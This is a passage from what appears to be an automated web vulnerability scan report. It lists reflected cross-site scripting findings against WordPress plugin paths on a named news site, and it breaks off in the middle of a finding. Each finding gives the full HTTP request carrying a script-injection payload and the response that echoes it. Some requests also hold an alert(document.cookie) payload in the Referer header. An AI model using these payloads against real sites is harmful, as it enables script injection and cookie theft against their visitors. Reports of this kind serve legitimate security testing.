GET /wp-contentd9fce"><script>alert(1)</script>061b055854c/plugins/fbconnect/fbconnect.css?ver=svn-62 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=483cc57eb4148851796f562cc4b67ebe
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:56 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentd9fce\"><script>alert(1)</script>061b055854c/plugins/fbconnect/fbconnect.css?ver=svn-62'; }); return true;" >
...[SNIP]...

4.214. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/fbconnect/fbconnect.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b64b0"><script>alert(1)</script>ace49c136b8 was submitted in the REST URL parameter 2. This input was echoed as b64b0\"><script>alert(1)</script>ace49c136b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsb64b0"><script>alert(1)</script>ace49c136b8/fbconnect/fbconnect.css?ver=svn-62 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=483cc57eb4148851796f562cc4b67ebe
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:42 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsb64b0\"><script>alert(1)</script>ace49c136b8/fbconnect/fbconnect.css?ver=svn-62'; }); return true;" >
...[SNIP]...

4.215. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/fbconnect/fbconnect.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9899b"><script>alert(1)</script>375893412e0 was submitted in the REST URL parameter 3. This input was echoed as 9899b\"><script>alert(1)</script>375893412e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/fbconnect9899b"><script>alert(1)</script>375893412e0/fbconnect.css?ver=svn-62 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:16:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=483cc57eb4148851796f562cc4b67ebe
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:16:24 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:16:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/fbconnect9899b\"><script>alert(1)</script>375893412e0/fbconnect.css?ver=svn-62'; }); return true;" >
...[SNIP]...

4.216. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/fbconnect/fbconnect.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9b1"><script>alert(1)</script>c5dd366a286 was submitted in the REST URL parameter 4. This input was echoed as 5c9b1\"><script>alert(1)</script>c5dd366a286 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/fbconnect/fbconnect.css5c9b1"><script>alert(1)</script>c5dd366a286?ver=svn-62 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=483cc57eb4148851796f562cc4b67ebe
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:57 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/fbconnect/fbconnect.css5c9b1\"><script>alert(1)</script>c5dd366a286?ver=svn-62'; }); return true;" >
...[SNIP]...

4.217. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/fbconnect/xd_receiver.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c0ed"><script>alert(1)</script>65331bb50cf was submitted in the REST URL parameter 1. This input was echoed as 7c0ed\"><script>alert(1)</script>65331bb50cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content7c0ed"><script>alert(1)</script>65331bb50cf/plugins/fbconnect/xd_receiver.htm HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:46 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content7c0ed\"><script>alert(1)</script>65331bb50cf/plugins/fbconnect/xd_receiver.htm'; }); return true;" >
...[SNIP]...

4.218. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/fbconnect/xd_receiver.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c325"><script>alert(1)</script>ba38a78e066 was submitted in the REST URL parameter 2. This input was echoed as 5c325\"><script>alert(1)</script>ba38a78e066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins5c325"><script>alert(1)</script>ba38a78e066/fbconnect/xd_receiver.htm HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:27 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins5c325\"><script>alert(1)</script>ba38a78e066/fbconnect/xd_receiver.htm'; }); return true;" >
...[SNIP]...

4.219. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/fbconnect/xd_receiver.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af9c3"><script>alert(1)</script>f364751cc0c was submitted in the REST URL parameter 3. This input was echoed as af9c3\"><script>alert(1)</script>f364751cc0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/fbconnectaf9c3"><script>alert(1)</script>f364751cc0c/xd_receiver.htm HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:16:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:03 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/fbconnectaf9c3\"><script>alert(1)</script>f364751cc0c/xd_receiver.htm'; }); return true;" >
...[SNIP]...

4.220. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/fbconnect/xd_receiver.htm

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb2d9"><script>alert(1)</script>637e04eddad was submitted in the REST URL parameter 4. This input was echoed as cb2d9\"><script>alert(1)</script>637e04eddad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/fbconnect/xd_receiver.htmcb2d9"><script>alert(1)</script>637e04eddad HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:43 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/fbconnect/xd_receiver.htmcb2d9\"><script>alert(1)</script>637e04eddad'; }); return true;" >
...[SNIP]...

4.221. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90d9f"><script>alert(1)</script>542b5f7bd06 was submitted in the REST URL parameter 1. This input was echoed as 90d9f\"><script>alert(1)</script>542b5f7bd06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content90d9f"><script>alert(1)</script>542b5f7bd06/plugins/jquery-t-countdown-widget/css/carbonite/style.css?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:12 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content90d9f\"><script>alert(1)</script>542b5f7bd06/plugins/jquery-t-countdown-widget/css/carbonite/style.css?ver=1.0'; }); return true;" >
...[SNIP]...

4.222. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25d2b"><script>alert(1)</script>68c4272be60 was submitted in the REST URL parameter 2. This input was echoed as 25d2b\"><script>alert(1)</script>68c4272be60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins25d2b"><script>alert(1)</script>68c4272be60/jquery-t-countdown-widget/css/carbonite/style.css?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:46 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins25d2b\"><script>alert(1)</script>68c4272be60/jquery-t-countdown-widget/css/carbonite/style.css?ver=1.0'; }); return true;" >
...[SNIP]...

4.223. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec0b3"><script>alert(1)</script>dcb07dde93d was submitted in the REST URL parameter 3. This input was echoed as ec0b3\"><script>alert(1)</script>dcb07dde93d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widgetec0b3"><script>alert(1)</script>dcb07dde93d/css/carbonite/style.css?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:42 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widgetec0b3\"><script>alert(1)</script>dcb07dde93d/css/carbonite/style.css?ver=1.0'; }); return true;" >
...[SNIP]...

4.224. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

